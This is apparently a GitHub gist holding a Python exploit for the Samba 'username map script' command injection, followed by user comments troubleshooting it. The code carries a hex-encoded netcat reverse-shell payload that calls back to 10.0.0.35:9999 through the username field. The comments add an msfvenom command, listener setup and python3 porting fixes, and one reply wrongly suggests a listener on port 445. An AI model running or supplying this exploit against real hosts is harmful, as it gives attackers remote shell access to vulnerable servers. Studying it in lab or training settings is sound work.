samba-usermap-exploit.py

#!/usr/bin/python

from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys


# Just a python version of a very simple Samba exploit. 
# It doesn't have to be pretty because the shellcode is executed
# in the username field. 

# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/ 

# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html

# Use the commandline argument as the target: 
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()


# Shellcode: 
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

buf =  ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"


username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

could u please clarify how the code ganna recognize the RHOST IP or the URL?

The command-line argument passed when calling this script sets the RHOST IP:
assert conn.connect(sys.argv[1], 445)

Running this on the command line generates a new shellcode for you to replace the variable buf with. The LHOST is declared there.
msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯ Traceback (most recent call last): File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in assert conn.connect(sys.argv[1], 445) AssertionError

Do you have a listener running at port 445?

Try running a listener before attempting this script:
nc -nvlp 445

folks using msf6 make sure lhosts = tun0 interface ip address else it won't work

hello dear friends, please help me :)

python SambaExploit.py 10.0.2.12
Traceback (most recent call last):
File "/root/Desktop/SambaExploit.py", line 39, in
assert conn.connect(sys.argv[1], 445)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/smb/SMBConnection.py", line 120, in connect
self.sock = socket.create_connection(( ip, port ), timeout = timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 851, in create_connection
raise exceptions[0]
File "/usr/lib/python3.11/socket.py", line 836, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

what should i do ?

olks using msf6 make sure lhosts = tun0 interface ip address else it won't work

okay bro, what can i do ?

that error just says you cant connect with the target, either the target is offline or not responding on that port.

to run this script successfully, follow the below steps: 1- sudo pip install pysmb 2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n") 3- since can't concatenate str (not "bytes") to str, we will decode our byte in line 38 then concatenate , so will be like this: username = "/=nohup " + buf.decode + ""

help please

like i said above, use python2 to avoid making these modifications
https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851?permalink_comment_id=3376452#gistcomment-3376452

like i said above, use python2 to avoid making these modifications

How can I use python 2? I am new to cyber security. This is why I don't understand much.

do you know how to run python 2.7 ? -- Sent from Mail.ru app for Android Saturday, 10 February 2024, 10:01pm +04:00 from ghost-ng ***@***.*** :

…

@ghost-ng commented on this gist. ---------------------------------------------------------------------- that error just says you cant connect with the target, either the target is offline or not responding on that port. — Reply to this email directly, view it on GitHub or unsubscribe . You are receiving this email because you commented on the thread. Triage notifications on the go with GitHub Mobile for iOS or Android .